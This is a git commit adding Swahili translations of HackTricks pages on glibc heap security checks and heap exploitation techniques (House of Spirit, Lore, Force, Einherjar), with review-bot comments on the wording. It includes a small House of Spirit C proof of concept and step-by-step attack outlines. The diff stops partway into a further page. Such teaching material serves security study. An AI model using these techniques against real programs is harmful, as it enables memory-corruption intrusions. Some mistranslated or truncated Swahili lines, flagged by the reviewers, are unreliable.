Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

This commit is contained in:
Translator 2024-05-14 11:15:08 +00:00
parent fe84003670
commit 23819d0a7b
12 changed files with 528 additions and 125 deletions


@ -726,6 +726,12 @@
* [Use After Free](binary-exploitation/heap/use-after-free/README.md)
* [First Fit](binary-exploitation/heap/use-after-free/first-fit.md)
* [Double Free](binary-exploitation/heap/double-free.md)
* [Unlink Attack](binary-exploitation/heap/unlink-attack.md)
* [Off by one overflow](binary-exploitation/heap/off-by-one-overflow.md)
* [House of Spirit](binary-exploitation/heap/house-of-spirit.md)
* [House of Lore](binary-exploitation/heap/house-of-lore.md)
* [House of Einherjar](binary-exploitation/heap/house-of-einherjar.md)
* [House of Force](binary-exploitation/heap/house-of-force.md)
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)
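Review bot: the new SUMMARY entries keep the technique names in English (House of Spirit, House of Lore, House of Einherjar, House of Force, Unlink Attack), but the pages they link to, added in this same commit, are titled "Nyumba ya Roho", "Nyumba ya Hadithi", "Nyumba ya Einherjar", "Nyumba ya Nguvu" and "Shambulio la Unlink"; pick one convention, and keeping the English names (they are proper nouns readers search for) is the safer one. Also "Off by one overflow" is the only new entry not in title case next to "Use After Free" and "Double Free"; write it "Off By One Overflow" or match the page heading.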


@ -10,13 +10,13 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## unlink
Kazi hii inaondoa kipande kutoka kwa orodha iliyounganishwa mara mbili. Ukaguzi wa kawaida hufanya uhakika kuwa muundo wa orodha iliyounganishwa unabaki thabiti wakati wa kuondoa vipande.
Kazi hii inaondoa kipande kutoka kwa orodha iliyounganishwa mara mbili. Ukaguzi wa kawaida hufanya uhakika muundo wa orodha iliyounganishwa unabaki thabiti wakati wa kuondoa vipande.
* **Ukaguzi wa Uthabiti**:
* Angalia ikiwa `P->fd->bk == P` na `P->bk->fd == P`.
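Review bot: the replacement of "udukuzi" by "kuhack" in the sponsor bullet is a step backwards: "kuhack" is an anglicism, and the new pages in this commit use "kudukua"/"udukuzi" for hacking, so keep "udukuzi" here. In the unlink paragraph the rewrite drops "kuwa" after "hufanya uhakika", leaving "hufanya uhakika muundo wa orodha ... unabaki thabiti" without its conjunction; keep "kuwa" (and "huhakikisha kuwa" reads more naturally than the calque "hufanya uhakika").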
@ -24,7 +24,7 @@ Kazi hii inaondoa kipande kutoka kwa orodha iliyounganishwa mara mbili. Ukaguzi
## \_int\_malloc
Kazi hii inahusika na kutenga kumbukumbu kutoka kwa heap. Ukaguzi hapa unahakikisha kuwa kumbukumbu haijaharibiwa wakati wa kutenga.
Kazi hii inahusika na kutenga kumbukumbu kutoka kwa heap. Ukaguzi hapa hufanya uhakika kumbukumbu haijaharibiwa wakati wa kutenga.
* **Ukaguzi wa Ukubwa wa Fastbin**:
* Wakati wa kuondoa kipande kutoka kwa fastbin, hakikisha ukubwa wa kipande uko ndani ya upeo wa fastbin.
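Review bot: the rewritten _int_malloc sentence swaps "unahakikisha kuwa kumbukumbu haijaharibiwa" for "hufanya uhakika kumbukumbu haijaharibiwa", which again drops the conjunction "kuwa" and replaces the standard verb with a calque of "make sure"; the original wording was the better one and should be restored.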
@ -34,17 +34,17 @@ Kazi hii inahusika na kutenga kumbukumbu kutoka kwa heap. Ukaguzi hapa unahakiki
* Ujumbe wa kosa: `malloc(): smallbin double linked list corrupted`
* **Ukaguzi wa Mipaka ya Kumbukumbu ya Unsorted Bin**:
* Hakikisha ukubwa wa vipande katika unsorted bin uko ndani ya mipaka ya chini na ya juu.
* Ujumbe wa kosa: `malloc(): memory corruption`
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Skenario la Kwanza)**:
* Ujumbe wa kosa: `malloc(): memory corruption | malloc(): invalid next size (unsorted)`
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Kesi ya Kwanza)**:
* Wakati wa kuingiza kipande kilichobaki katika unsorted bin, angalia ikiwa `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`.
* Ujumbe wa kosa: `malloc(): corrupted unsorted chunks`
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Skenario la Pili)**:
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Kesi ya Pili)**:
* Kama ukaguzi uliopita, lakini unachochea wakati wa kuingiza baada ya kugawanya kipande cha haraka au kidogo.
* Ujumbe wa kosa: `malloc(): corrupted unsorted chunks 2`
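Review bot: the unsorted bin bounds bullet now reads `malloc(): memory corruption | malloc(): invalid next size (unsorted)`, and the "|" inside a single backtick span looks like part of the glibc string. Put each message in its own backticks separated by "au", or in two sub-bullets, and say which check raises which message, since they are two different strings a reader will grep for. The "Skenario la Kwanza/Pili" to "Kesi ya Kwanza/Pili" rename is fine.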
## \_int\_free
Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikisha kutolewa kwa kumbukumbu kwa usahihi na kuzuia uharibifu wa kumbukumbu.
Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikisha kumbukumbu inatolewa kwa usahihi na kuzuia uharibifu wa kumbukumbu.
* **Ukaguzi wa Mipaka ya Pointer**:
* Hakikisha kipande kinachofutwa hakizunguki kumbukumbu.
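Review bot: neither the old nor the new line fixes "Kazi hii huru kumbukumbu": "huru" is the adjective "free", not a verb, so the sentence has no predicate. "Kazi hii huachilia kumbukumbu iliyotengwa hapo awali" (this function releases previously allocated memory) is what is meant; the rewritten second sentence ("kuhakikisha kumbukumbu inatolewa kwa usahihi") is an improvement and can stay.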
@ -53,9 +53,9 @@ Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikis
* Hakikisha ukubwa wa kipande kinachofutwa ni angalau `MINSIZE` au maradufu ya `MALLOC_ALIGNMENT`.
* Ujumbe wa kosa: `free(): invalid size`
* **Ukaguzi wa Ukubwa wa Fastbin**:
* Kwa vipande vya fastbin, hakikisha ukubwa wa kipande kinachofuata uko ndani ya mipaka ya chini na ya juu.
* Kwa vipande vya fastbin, hakikisha ukubwa wa kipande kifuatacho uko ndani ya mipaka ya chini na ya juu.
* Ujumbe wa kosa: `free(): invalid next size (fast)`
* **Ukaguzi wa Double Free wa Fastbin**:
* **Ukaguzi wa Kufuta Mara Mbili wa Fastbin**:
* Wakati wa kuingiza kipande katika fastbin, hakikisha kipande kichwa sio sawa na kile kinachoingizwa.
* Ujumbe wa kosa: `double free or corruption (fasttop)`
* **Ukaguzi wa Uthabiti wa Fastbin**:
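Review bot: the heading change to "Ukaguzi wa Kufuta Mara Mbili wa Fastbin" translates "double free", while the error string two lines below (`double free or corruption (fasttop)`) and the SUMMARY entry "Double Free" added in this commit keep the English term; use the same term in both places so readers can connect the heading to the page it links to. In the bullet under it, "hakikisha kipande kichwa sio sawa na kile kinachoingizwa" needs the connective: "kipande cha kichwa" (the chunk at the head of the bin).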
@ -65,13 +65,13 @@ Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikis
* Kwa vipande visivyo vya fastbin, hakikisha kipande sio sawa na kipande cha juu.
* Ujumbe wa kosa: `double free or corruption (top)`
* **Ukaguzi wa Mipaka ya Kumbukumbu**:
* Hakikisha kipande kinachofuata kumbukumbu iko ndani ya mipaka ya uwanja.
* Hakikisha kipande kifuatacho kwa kumbukumbu iko ndani ya mipaka ya uwanja.
* Ujumbe wa kosa: `double free or corruption (out)`
* **Ukaguzi wa Biti ya Prev\_inuse**:
* Hakikisha biti ya awali-inatumika katika kipande kinachofuata imehakikishwa.
* Hakikisha biti ya awali-inatumika katika kipande kifuatacho imeandikwa.
* Ujumbe wa kosa: `double free or corruption (!prev)`
* **Ukaguzi wa Ukubwa wa Kawaida**:
* Hakikisha ukubwa wa kipande kinachofuata uko ndani ya mipaka inayofaa.
* Hakikisha ukubwa wa kipande kifuatacho uko ndani ya upeo wa halali.
* Ujumbe wa kosa: `free(): invalid next size (normal)`
* **Ukaguzi wa Uthabiti wa Unsorted Bin**:
* Wakati wa kuingiza kipande kilichounganishwa katika unsorted bin, angalia ikiwa `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`.
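Review bot: the memory-bounds bullet is still ungrammatical after the rewrite: "Hakikisha kipande kifuatacho kwa kumbukumbu iko ndani ya mipaka ya uwanja" pairs the subject "kipande" with the verb form "iko"; it should be "Hakikisha kipande kifuatacho kiko ndani ya mipaka ya uwanja (arena)". In the prev_inuse bullet, replacing "imehakikishwa" with "imeandikwa" (is written) changes the meaning; the check is that the bit is set, so "imewekwa" is the right verb. "upeo wa halali" in the normal-size bullet should be "upeo halali".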
@ -87,6 +87,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
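Review bot: same regression as in the header block of this file: "udukuzi" is replaced by the anglicism "kuhack" in the closing sponsor bullet, while the new pages added in this commit use "kudukua"; keep one term in both blocks.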


@ -0,0 +1,61 @@
# Nyumba ya Einherjar
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
* Angalia mfano kutoka [https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c)
### Lengo
* Lengo ni kutenga kumbukumbu karibu na anwani yoyote maalum.
### Mahitaji
* Kosa la moja kwa moja juu ya kichwa cha kipande kinachofuata ili kurekebisha `prev in use`
* Kuweza kurekebisha data ya `prev_size`, ambayo ni sehemu ya kipande cha sasa (mwishoni)
* Kuvuja kwa kumbukumbu
### Shambulio
* Kipande bandia `A` kinajengwa ndani ya kipande kinachodhibitiwa na mkaidi ukionyesha na `fd` na `bk` kwa kipande cha asili ili kuepuka ulinzi
* Vipande vingine 2 (`B` na `C`) vinajengwa.
* Kwa kutumia kosa la moja kwa moja katika `B` moja, biti ya `prev in use` inasafishwa na data ya `prev_size` inaandikwa upya na tofauti kati ya mahali ambapo kipande cha `C` kinatengwa, na kipande bandia `A` kilichozalishwa awali.
* Hii `prev_size` na ukubwa wa kipande bandia `A` lazima ziwe sawa ili kuepuka ukaguzi.
* Kisha, Tcache inajazwa
* Kisha, `C` inaachiliwa ili iungane na kipande bandia `A`
* Kisha, kipande kipya `D` kinajengwa ambacho kitakuwa kuanzia kwenye kipande bandia `A` na kufunika kipande cha `B`
* Kisha, `B` inaachiliwa na `fd` yake inaandikwa upya kwa anwani ya lengo ikifanya ielekee anwani ya lengo ikidukua kipande cha `D` kinachokijumuisha.
* Kisha, malloc 2 zinafanywa kwa sababu ya pili itakuwa ikijumuisha anwani ya lengo
## Marejeo
* [https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
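Review bot: "mkaidi" (a stubborn person) in the first Attack bullet is a mistranslation of "attacker"; the House of Lore and Unlink pages in this same commit use "mshambuliaji", so use that here too. The page also says "inaachiliwa" for freeing a chunk where the heap-functions page in this commit uses "kufutwa"; keep one verb for free() across the pages. The bullet "`B` inaachiliwa na `fd` yake inaandikwa upya ... ikidukua kipande cha `D` kinachokijumuisha" is hard to follow; say plainly that `B`'s `fd` is overwritten through the overlapping chunk `D` that contains it.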


@ -0,0 +1,56 @@
# Nyumba ya Nguvu
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
* Mbinu hii ilifungiwa ([**hapa**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) na husababisha kosa hili: `malloc(): corrupted top size`
### Lengo
* Lengo la shambulio hili ni kuweza kutenga kipande katika anwani maalum.
### Mahitaji
* Kujaza ambayo inaruhusu kubadilisha ukubwa wa kichwa cha kipande cha juu (k.m. -1).
* Kuweza kudhibiti ukubwa wa kutengwa kwa rundo
### Shambulio
Ikiwa muhusika anataka kuwa na kipande katika anwani P, baada ya kujaza ukubwa wa kichwa cha kipande cha juu na -1, kwanza kabisa inahitajika kutengwa kwa (\&top\_chunk - P). Kumbuka kuwa kidole hiki kinaweza kuwa kabla au baada ya top\_chunk kwani ukubwa wowote utakuwa chini ya -1 (0xFFFFFFFFFFFFFFFF). Kisha, baada ya kutenga kipande hiki cha awali, kipande cha juu kitahamishwa kwenye anwani ya P iliyotaka na kipande kinachofuata kitakuwa kutoka kwenye anwani hiyo.
### Marejeo
* [https://github.com/shellphish/how2heap/tree/master](https://github.com/shellphish/how2heap/tree/master?tab=readme-ov-file)
* [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_force/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_force/)
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_force](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_force)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
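Review bot: in the Attack paragraph "kidole" (finger) stands for "pointer" and "muhusika" for "attacker"; the House of Lore and Unlink pages in this commit use "pointa" and "mshambuliaji", so align the terms. "Mbinu hii ilifungiwa" in the first bullet means the technique was locked up; the linked glibc commit patched it, so "ilirekebishwa" or "ilizibwa" is the verb. The closing sponsor bullet still has the English "and" between the two repository links where every other copy of the block uses "na".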


@ -0,0 +1,61 @@
# Nyumba ya Hadithi
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
* Hii haifanyi kazi
* Angalia kutoka [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/)
* Au: [https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c)
### Lengo
* Ingiza vipande bandia vidogo kwenye bakuli ndogo ili kuiruhusu kupangiwa.
### Mahitaji
* Unda vipande bandia
* Jua anwani ya kipande cha mwathirika na vipande bandia
* Uweze kurekebisha pointa za `bk` na `fd`
### Shambulio
* Kipande kidogo cha mwathirika kinapangiwa
* Mshambuliaji anazalisha vipande vya bandia viwili, na kufanya kipande cha kwanza cha bandia kiweke `fd` ikionyesha kipande halisi na `bk` ikionyesha kipande cha pili cha bandia. Pia fanya kipande cha pili cha bandia `bk` iweke kipande cha kwanza.
* Kisha, kipande kikubwa kipya kinapangiwa kuzuia kipande cha kwanza kuchanganywa kwenye kipande cha juu wakati kinapofutwa
* Kisha, kipande cha awali kinachopangiwa kufutwa na kipande cha pili cha ukubwa mkubwa kinapangiwa ili kipande kidogo kilichofutwa kipangwe kwenye bakuli ndogo.
* Kipande halisi kidogo kinarekebishwa ili pointa yake ya `bk` iweke kwenye bandia na.
* Kisha, wakati vipande 2 vya ukubwa huu vinapopangiwa wanapata kipande halisi kwanza na kisha kipande kisicho halali kinachodhibitiwa kwa njia fulani na mshambuliaji.
## Marejeo
* [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/)
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_lore](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_lore)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
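Review bot: "bakuli ndogo" (small bowl) in the Goal and Attack bullets is a mistranslation of "small bin"; every other page in this commit leaves bin names untranslated ("unsorted bin", "fastbin", "Tcache"), so write "small bin". The second-to-last Attack bullet is cut off: "ili pointa yake ya `bk` iweke kwenye bandia na." stops after "na" (and); either finish the sentence or drop the dangling "na". "Hii haifanyi kazi" under Code gives no glibc version; the how2heap link right below it is the 2.39 example, so say on which versions the technique stops working.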


@ -0,0 +1,99 @@
# Nyumba ya Roho
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
<details>
<summary>Nyumba ya Roho</summary>
```c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit
struct fast_chunk {
size_t prev_size;
size_t size;
struct fast_chunk *fd;
struct fast_chunk *bk;
char buf[0x20]; // chunk falls in fastbin size range
};
int main() {
struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory
void *ptr, *victim;
ptr = malloc(0x30);
printf("Original alloc address: %p\n", ptr);
printf("Main fake chunk:%p\n", &fake_chunks[0]);
printf("Second fake chunk for size: %p\n", &fake_chunks[1]);
// Passes size check of "free(): invalid size"
fake_chunks[0].size = sizeof(struct fast_chunk);
// Passes "free(): invalid next size (fast)"
fake_chunks[1].size = sizeof(struct fast_chunk);
// Attacker overwrites a pointer that is about to be 'freed'
// Point to .fd as it's the start of the content of the chunk
ptr = (void *)&fake_chunks[0].fd;
free(ptr);
victim = malloc(0x30);
printf("Victim: %p\n", victim);
return 0;
}
```
</details>
### Lengo
* Kuweza kuongeza anwani ya kiholela kwenye tcache / fast bin ili wakati wa kuita malloc itumike kwenye kipande
### Mahitaji
* Shambulio hili linahitaji mshambuliaji kuweza kuunda vipande vya uwongo vya haraka vinavyoonyesha kwa usahihi thamani ya ukubwa wake na kubadilisha kipande cha haraka cha ukubwa huo ambacho kitafutwa, ili kipande cha mshambuliaji ndicho kinachopata kwenye fast bin.
### Shambulio
* Unda kipande cha uwongo kinachopuuza ukaguzi wa usalama (utahitaji vipande vya uwongo 2)
* Kabla ya kipande kufutwa, libadilishe na kipande cha uwongo ili hicho ndicho kinachopata kwenye bin
## Marejeo
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
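Review bot: the `<summary>` of the closing block ("Jifunze AWS hacking ... htARTE (HackTricks AWS Red Team Expert)") is left half in English while the opening block on the same page is fully translated; copy the opening block. In the Requirements bullet "vipande vya uwongo vya haraka" (false fast chunks) competes with "vipande bandia", the term the House of Einherjar and House of Lore pages use for fake chunks; pick "vipande bandia" and write "kipande cha fastbin" for a fast chunk so the bin name stays searchable. In the code listing the comment "add som prints" has a typo ("some"), carried over from the altered source; worth fixing since that comment is the only attribution of the code.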


@ -0,0 +1,62 @@
# Kujazwa kwa kosa moja
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
